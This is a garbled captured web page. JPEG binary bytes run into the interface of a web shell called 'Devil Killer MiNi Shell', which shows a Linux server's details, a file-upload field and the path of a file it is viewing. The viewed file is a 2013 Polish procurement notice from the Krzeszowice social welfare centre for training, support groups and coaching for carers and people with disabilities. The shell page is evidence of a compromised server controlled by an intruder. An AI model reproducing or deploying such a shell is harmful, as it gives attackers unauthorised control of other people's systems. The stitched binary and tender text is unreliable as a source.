JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130621/120487-N-2013.html

<p class="kh_header"><b>Krzeszowice: Usługi szkoleniowe dla Uczestników Projektu Systemowego Gminnego Ośrodka Pomocy Społecznej pn.Aktywność daje możliwość. Program aktywizacji społecznej i zawodowej podopiecznych GOPS Krzeszowice</b><br>
<b>Numer ogłoszenia: 120487 - 2013; data zamieszczenia: 21.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Kościuszki 43, 32-065 Krzeszowice, woj. małopolskie, tel. 0-12 258 30 80, faks 0-12 258 30 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops.krzeszowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla Uczestników Projektu Systemowego Gminnego Ośrodka Pomocy Społecznej pn.Aktywność daje możliwość. Program aktywizacji społecznej i zawodowej podopiecznych GOPS Krzeszowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1: Trening kompetencji społecznych oraz wsparcie dla dzieci/osób niepełnosprawnych
  Obowiązki Wykonawcy:
a)	Wykonawca przygotuje szczegółowy program oraz harmonogram szkolenia, prezentacje multimedialne, certyfikaty/zaświadczenia o ukończeniu szkolenia,
b)	Wykonawca zapewni trenerów z kompetencjami do realizacji zadań (prowadzenia warsztatów i  ćwiczeń) w przedmiotowym zakresie,
c)	Wykonawca wystawi uczestnikom szkolenia zaświadczenia/certyfikaty o ukończeniu szkolenia, zawierające informacje o jego temacie oraz wymiarze godzin, 
d)	Wykonawca przeprowadzi ewaluację szkolenia - dokona oceny szkolenia za pomocą ankiet ewaluacyjnych opracowanych zgodnie z przekazanym przez Zamawiającego wzorem,
e)	Wykonawca poinformuje uczestników o współfinansowaniu projektu ze środków Unii Europejskiej,
f)	po zakończeniu usługi szkoleniowej Wykonawca przedstawi Zamawiającemu dokumentację szkolenia, na którą złożą się: listy obecności, listy potwierdzające odbiór materiałów, listy potwierdzające korzystanie z posiłków, kopie certyfikatów, dziennik zajęć, informacje o wykonaniu usługi szkoleniowej.

Wyjazd dla 70 osób w podziale na 2 grupy:
-	I Grupa   to 18 UP oraz 17 dzieci/osób niepełnosprawnych (w tym 8 osób poruszających się na wózkach inwalidzkich)
-	II Grupa   to 18 UP oraz 17 dzieci/osób niepełnosprawnych ( w tym 4 osoby poruszające się na wózkach inwalidzkich)
Pięciodniowy wyjazd, na którym odbędzie się 30h szkolenie Treningu kompetencji społecznych dla Uczestników projektu i co najmniej 30h zajęć grupowych dla dzieci/osób niepełnosprawnych. 
Wymagany termin realizacji szkolenia do  31 lipca 2013r.

Zakres merytoryczny dla UP:  Wskazane jest, aby zajęcia Treningu Kompetencji Społecznych  prowadzone były metodami aktywizującymi dającymi możliwość przećwiczenia umiejętności w zakresie kompetencji społecznych i zmiany postawy  życiowej.
Ponieważ grupy są dość liczne - dla utrzymania dynamiki zajęć i maksymalnego zaangażowania uczestników wskazane jest, aby zajęcia prowadziło dwóch trenerów.
Rekomendacje co do zawartości merytorycznej:
.	Umiejętność autoprezentacji i kształtowania własnego wizerunku
.	Umiejętność komunikacji interpersonalnej 
.	Kształtowanie asertywnej postawy
.	Inteligencja emocjonalna- identyfikowanie, nazywanie, wyrażanie, przyjmowanie emocji , budowanie więzi emocjonalnych z innymi
.	Umiejętność radzenia sobie ze stresem i sytuacją zmiany
.	Umiejętność współpracy z innymi i rozwiązywania konfliktów
.	Umiejętność stawiania sobie celów, planowania, podejmowania decyzji i automotywowania się do działania
Wsparcie dla dzieci/ osób niepełnosprawnych

A.	 GRUPA 1 
Pierwsza grupa  osób niepełnosprawnych to dorośli w przedziale wiekowym od 23- 45 lat. Większość spośród tej grupy to osoby upośledzone umysłowo w różnym stopniu, często ze sprzężoną niepełnosprawnością. Wskazane są:
1.	grupowe formy aktywności nastawione na ćwiczenie umiejętności życiowych, budowanie relacji,
2.	trening umiejętności społecznych w aranżowanych i realnych sytuacjach życia codziennego,
3.	indywidualne formy pracy prowadzone przez specjalistów, którzy mają wykształcenie i doświadczenie w zakresie neurologopedii lub logopedii, rehabilitacji ruchowej, terapii behawioralno- poznawczej, psychologii, oligofrenopedagogice, tyflopedagogice,
4.	wielu spośród tych osób to niepełnosprawni ruchowo, na wózkach, w pełni zależni w podstawowych potrzebach fizjologicznych od drugiej osoby, dlatego konieczne będzie zapewnienie wykwalifikowanej opieki.
 

B GRUPA 2
Zaproponowana druga grupa  to niepełnosprawne dzieci w wieku od 3- 19 lat. Z uwagi na rozpiętość wiekową proponuje się podział na dwie podgrupy: 1/ dzieci w wieku 3- 9 lat; 2/ dzieci w wieku 12- 19 lat. Dla każdej z tych podgrup proponuje się:
1.	grupową formę pracy, której celem byłoby budowanie więzi, uspołecznianie,
2.	formy indywidualne dopasowane do potrzeb konkretnych dzieci. Rekomenduje się indywidualne zajęcia z  logopedą, rehabilitantem, terapeutą behawioralno- poznawczym, terapeutą zaburzeń integracji sensomotorycznej, psychologiem. 

  Obowiązki organizacyjne
         
      1.  Przeprowadzenie szkoleń dla grup uczestników wskazanych przez Zamawiającego.
2.	Zapewnienie ośrodka szkoleniowego o standardzie co najmniej  2- gwiazdkowym lub równoważnym zapewniającego zakwaterowanie, wyżywienie oraz sale dydaktyczne  na terenie Beskidu Śląskiego, Sądeckiego, Żywieckiego, Tatr lub Podhala. 
3.	Zakwaterowanie z zapleczem socjalnym i sanitarnym dla wszystkich osób uczestniczących w szkoleniach. Pokoje 2 lub 3-osobowe z łazienką ( w tym dla 10 osób poruszających się na wózku inwalidzkim). Temperatura w pomieszczeniach noclegowych - max. 230 C.
4.	Sale dydaktyczne z wyposażeniem (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart) . Krzesła tapicerowane, temperatura w salach 21 - 230C.
5.	Ośrodek powinien być dostosowany do potrzeb osób niepełnosprawnych.
6.	Całodzienne wyżywienie składające się z trzech posiłków  ( śniadania, obiad dwudaniowy , deser, kolacja), catering podczas zajęć ( kawa, herbata, napoje, ciastka  coctailowe).
7.	Wykonawca uwzględni rodzaj diety wynikającej z uwarunkowań jednostki chorobowej uczestnika wyjazdu.
8.	Zamawiający poinformuje Wykonawcę o rodzaju diety, co najmniej trzy dni wcześniej przed przyjazdem grupy do ośrodka.
9.	Zapewnienie kierownika grupy, który będzie prowadził stały nadzór nad grupą oraz będzie organizował czas wolny uczestnikom wyjazdu. Kierownik grupy zapewnia opiekę organizacyjną od momentu wyjazdu grupy z Krzeszowic do momentu powrotu grupy do Krzeszowic.
    10. Zapewnienie dostępu do świadczeń zdrowotnych przysługujących na podstawie powszechnie    obowiązujących przepisów.
11.	Wykonawca ubezpieczy wszystkich uczestników wyjazdu od następstw nieszczęśliwych wypadków w czasie trwania pobytu oraz podczas przejazdu w obie strony.
12.	Wykonawca poniesie koszty opłaty uzdrowiskowej/ klimatycznej za wszystkich uczestników wyjazdu.
13.	Wykonawca winien działać zgodnie z ustawą o ochronie danych osobowych ( Dz. U. 2002r Nr 101, poz. 926 z późn. zmianami). Dane osobowe uczestników  wskazanych przez Zamawiającego będą przetwarzane przez Wykonawcę w oparciu o umowę o powierzeniu przetwarzania danych osobowych.
14.	Oznakowanie ośrodka i pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji  i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Projektu systemowego oraz umieszczenie informacji o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego w postaci plakatów.
15.	Zorganizowanie transportu zbiorowego dla uczestników wyjazdu z miejscowości Krzeszowice z miejsca wskazanego przez Zamawiającego do miejsca realizacji usługi w dniu rozpoczęcia oraz z powrotem w dniu zakończenia pobytu oraz transport na potrzeby organizowanych przez Wykonawcę wycieczek oraz innych planowanych działań/ zajęć/spotkań z uwzględnieniem indywidualnych potrzeb uczestników, w tym osób niepełnosprawnych.
            Wymagania:
a.	autokar musi być wyposażony w sprawną klimatyzację, z aktualnym przeglądem technicznym,
b.	zamawiający zastrzega sobie prawo do kontroli autokaru/ów przez odpowiednie służby i inspekcje przed rozpoczęciem podróży,
c.	Wykonawca zleci kontrolę autokaru/ów przed wyjazdem w drogę powrotną odpowiednim służbom kontroli i inspekcjom,
d.	w przypadku awarii autokaru lub w razie wykazania przez organy kontroli niesprawności autokar/ów, Wykonawca w ciągu 1 godziny podstawi sprawny pojazd zastępczy,
e.	do grupy podczas transportu nie może być dołączona inna grupa bądź inne osoby,
f.	autokar powinien być podstawiony minimum 45 minut przed wyjazdem.

16.	Wykonawca w trakcie realizacji zamówienia dokona rezerwacji pokoju/pokoi i zapewni wyżywienie nieodpłatnie na czas trwania wyjazdu dla 2 pracowników kontrolujących wykonanie zamówienia wyznaczonych przez Zamawiającego.

17.	Zorganizowanie wieczorku integracyjnego wraz z poczęstunkiem. Zapoznanie się uczestników wyjazdu  z lokalną tradycją i kulturą - zorganizowanie ogniska/ grilla, przyśpiewki, kuchnia regionalna itp. 
18.	Zorganizowanie wycieczki autokarowej - zwiedzanie okolicznych atrakcji turystycznych. Podczas wycieczki Wykonawca zapewni przewodnika oraz opłaci bilety wstępu.
19.	Zorganizowanie zajęć z kreowania własnego wizerunku, zajęcia z wizażystą/kosmetyczką  
.	Teoria
.	Część praktyczna - zabiegi kosmetyczne lub fryzjerskie dla każdego uczestnika projektu tj. 36 osób


 Zamawiający informuje, że do organizowanej usługi będzie stosował prawo opcji. Podane ilości osób są wielkościami, które Zamawiający maksymalnie skieruje na wyjazd. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmianie o 4 osoby.
 

Zadanie 2:  Grupa wsparcia

Obowiązki Wykonawcy:

a) Wykonawca przygotuje ramowy program dla każdej grupy, certyfikaty/zaświadczenia potwierdzające uczestnictwo w Grupach Wsparcia, a ich kopie przekaże Zamawiającemu,
b) Wykonawca zapewni psychologa z doświadczeniem w prowadzeniu grup wsparcia  z kompetencjami do realizacji zadań w przedmiotowym zakresie,
c) Wykonawca wystawi uczestnikom zajęć zaświadczenia/certyfikaty o ukończeniu Grupy Wsparcia  zawierające informację o jego temacie oraz wymiarze godzin, 
d) Wykonawca przeprowadzi ewaluację przeprowadzonych zajęć - dokona oceny  za pomocą ankiet ewaluacyjnych,
e) Wykonawca obejmie wszystkich uczestników zajęć  ubezpieczeniem od nieszczęśliwych wypadków,
f) po zakończeniu usługi   Wykonawca przedstawi Zamawiającemu dokumentację  , na którą złożą się: listy obecności, listy potwierdzające odbiór materiałów, listy potwierdzające korzystanie z posiłków, kopie certyfikatów, informacje o wykonaniu usługi przeprowadzenia Grup Wsparcia, oraz 1 komplet materiałów z przeprowadzonych zajęć.

Liczba uczestników : Tą formą pomocy jaką są grupy wsparcia proponuje się objąć wszystkich uczestników projektu- 36 osób. Aby grupy mogły działać sprawnie i realizować zakładane cele proponuje się podział uczestników na 4 grupy  +/- 9- osobowe. 
Wskazane byłoby, aby kryterium doboru do grup wsparcia był rodzaj problemów opiekuna wynikający  z  wieku dziecka niepełnosprawnego oraz wieku  samego uczestnika grupy wsparcia
Liczba godzin : maksymalnie 9 spotkań ( średnio 2-3 razy w miesiącu) po 2 godziny zegarowe dla każdej grupy. 
Wymagany termin realizacji szkolenia do 30 listopada 2013r
Zakres merytoryczny: 
.	czas dla siebie i własnych zainteresowań, dzielenie się doświadczeniem, praca nad autowizerunkiem, odreagowywanie stresu, budowanie pozytywnej samooceny, pewności siebie, wsparcie psychologiczne, wzmacnianie pewności siebie
.	dla rodziców małych dzieci wymiana doświadczeń w obszarze  problemów wychowawczych, uczenie się od innych, budowanie relacji, uczenie się odreagowywania stresu, akceptacja nieprawidłowości w rozwoju swojego dziecka
potrzeba spotkania ze specjalistami takimi jak np.: psycholog,  prawnik  ( kwestie prawne    związane z niepełnosprawnością), lekarz.

 Obowiązki organizacyjne 

1. Przeprowadzenie grup wsparcia dla  uczestników wskazanych przez Zamawiającego.
2. Zapewnienie odpowiednich warunków lokalowych i socjalnych  na terenie Krzeszowic, sala dydaktyczna adekwatna do wielkości grupy, z osobnymi miejscami dla każdego uczestnika , z odpowiednim oświetleniem, ogrzewaniem i wentylacja, dostępem do toalety i bieżącej wody.
3. Zapewnienie cateringu na czas spotkania grupy wsparcia (ciepły posiłek , kawa, herbata, cukier, mleko do kawy, woda, ciastka coctailowe).
4. Oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji  i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Projektu systemowego oraz umieszczenie informacji o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego w postaci plakatów,

 
Zadanie 3 : Spotkania z coachem 

-	przeprowadzenie indywidualnych spotkań z coachem - średnio- 5 spotkań po 2 godziny zegarowe  dla każdego uczestnika,
-	zapewnienie wykwalifikowanej kadry,
-	zapewnienie sali , w której odbędzie się spotkanie,
-	odpowiednie zabezpieczenie i przygotowanie miejsca , w którym będzie świadczona usługa, w zakresie niezbędnym do jej realizacji,
-	zapewnienie właściwych warunków bezpieczeństwa i higieny,
-	prowadzenie dokumentacji : dziennika oraz indywidualnej karty pracy zawierającej m .in. datę spotkania , temat, podpis UP,
-	dostarczenie protokołu przebiegu  coachingu,
-	 przeprowadzenie ewaluacji/raportów z przeprowadzonych spotkań 
-	bezzwłoczne informowanie Zamawiającego w formie telefonicznej o każdej nieobecności uczestnika  projektu,
-	ubezpieczenie uczestników od następstw nieszczęśliwych wypadków,
-	 zapewnienie uczestnikom cateringu na czas trwania spotkania coachingowego ( poczęstunek, napoje, kawa, herbata ).

Liczba uczestników: opcjonalnie dla 26 osób. Zamawiający zastrzega, że dokona zapłaty za faktycznie zrealizowaną ilość usług.
Liczba godzin dydaktycznych średnio 5 spotkań / 1 UP po 2 godziny zegarowe.
Wymagany termin realizacji coachingu: 30.11.2013r 
Zakres merytoryczny:  O zakresie decyduje sam coachowany, tematem może być m.in. 
.	wsparcie skierowane na poprawę funkcjonowania rodzin, w których żyje osoba  niepełnosprawna 
.	wzbudzenie autorefleksji i motywacji odnośnie własnego rozwoju, zmiana blokujących przekonań, budowanie pozytywnej samooceny, formułowanie celów życiowych i zaplanowanie kroków ich realizacji, przepracowanie tematu przyszłości niepełnosprawnej osoby, praca nad umiejętnością stawiania celów, pewnością siebie, przeciwdziałanie odwlekaniu i trudnościom w podejmowaniu decyzji, wsparcie psychologiczne
 
 
Zadanie 4: Trening kompetencji rodzicielskich

Obowiązki Wykonawcy:

a) Wykonawca przygotuje szczegółowy program oraz harmonogram szkolenia, prezentacje multimedialne, certyfikaty/zaświadczenia o ukończeniu szkolenia, 
b) Wykonawca zapewni trenerów z kompetencjami do prowadzenia warsztatów i  ćwiczeń w przedmiotowym zakresie,
c) Wykonawca wystawi uczestnikom szkolenia zaświadczenia/certyfikaty o ukończeniu szkolenia,  zawierające informacje o jego temacie oraz wymiarze godzin, 
d) Wykonawca przeprowadzi ewaluację szkolenia - dokona oceny szkolenia za pomocą ankiet ewaluacyjnych opracowanych zgodnie z przekazanym przez Zamawiającego wzorem. 
e) Wykonawca obejmie wszystkich uczestników szkolenia ubezpieczeniem od nieszczęśliwych wypadków,
f) Wykonawca zorganizuje dowóz uczestników szkolenia na trasie: miejscowość zamieszkania - miejsce szkolenia - miejscowość zamieszkania każdego dnia szkolenia,
g) po zakończeniu usługi szkoleniowej Wykonawca przedstawi Zamawiającemu dokumentację szkolenia, na którą złożą się: listy obecności, listy potwierdzające odbiór materiałów, listy potwierdzające korzystanie z posiłków, kopie certyfikatów, dziennik zajęć, informacja wykonaniu usługi szkoleniowej. 

Liczba uczestników  szkolenia wynosi 26 osób, z podziałem  na dwie grupy I grupa 13 osób, II grupa 13 osób
Liczba godzin dydaktycznych : 2 moduły X 16h  - szkolenie stacjonarne
Wymagany termin realizacji szkolenia do 31 października 2013r
Zakres merytoryczny dla I grupy 
.	Właściwa postawa rodzicielska, spójność postaw rodziców
.	Umiejętność komunikowania się z dzieckiem na terenie Krzeszowic
.	Umiejętność wyrażania uczuć wobec dziecka oraz radzenia sobie z jego negatywnymi emocjami i agresją, 
.	Umiejętność właściwego karania i nagradzania dziecka, konsekwencja w postępowaniu z dzieckiem
.	Umiejętność spędzania czasu wolnego z dzieckiem i rozwijającej zabawy
.	Umiejętność motywowania dziecka do uczenia się
.	Postawa akceptacji w stosunku do dziecka, uwzględniająca jego ograniczenia i potrzeby związane z niepełnosprawnością

Zajęcia powinny mieć charakter warsztatów ćwiczących umiejętności, z podstawową wiedzą teoretyczną . Wskazane jest, aby były prowadzone przez dwóch trenerów mających doświadczenie w pracy z dziećmi niepełnosprawnymi i w prowadzeniu zajęć warsztatowych dla rodziców.
Wskazane jest wprowadzenie modułu kształcącego u rodziców umiejętność stosowania techniki masażu ( np. Shantal Special Care) jako sposobu m.in. wyciszania, redukowania napięcia mięśniowego, nadpobudliwości i reakcji agresywnych.

Zakres merytoryczny dla II grupy: 

.	Zniwelowanie niepokoju związanego z troską o przyszłość dziecka
.	Planowanie przyszłości dziecka niepełnosprawnego
.	Radzenie sobie z emocjami , w tym negatywnymi, dorosłego niepełnosprawnego, jego złością i agresją
.	Radzenie sobie z potrzebami dorosłego niepełnosprawnego dziecka

	W pracy z ta grupą rodziców należy  wprowadzić moduł kształtujący umiejętności wykorzystania masażu w oddziaływaniach na dziecko niepełnosprawne. 
 

1 Obowiązki organizacyjne

1. Zapewnienie sali szkoleniowej na terenie gminy Krzeszowice umożliwiającej realizację ww. zajęć z wyposażeniem (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart). Sala powinna mieścić minimalnie 20 osób. Krzesła tapicerowane, temperatura w sali 21 - 230C.
2. Zapewnienie jednego posiłku (obiadu 2-daniowego+deseru) dla każdego uczestnika szkolenia oraz dodatkowo serwisu kawowego z poczęstunkiem (kawa, herbata, woda,   ciastka) podczas szkoleń - 2 razy dziennie.
3. Oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Projektu systemowego oraz umieszczenie informacji o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego w postaci plakatów/informacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku zostanie dokonana na podstawie złożonych oświadczeń i dokumentów zgodnie ze SIWZ wg. formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku zostanie dokonana na podstawie złożonych oświadczeń i dokumentów zgodnie ze SIWZ wg. formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku zostanie dokonana na podstawie złożonych oświadczeń i dokumentów zgodnie ze SIWZ wg. formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku zostanie dokonana na podstawie złożonych oświadczeń i dokumentów zgodnie ze SIWZ wg. formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku zostanie dokonana na podstawie złożonych oświadczeń i dokumentów zgodnie ze SIWZ wg. formuły: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

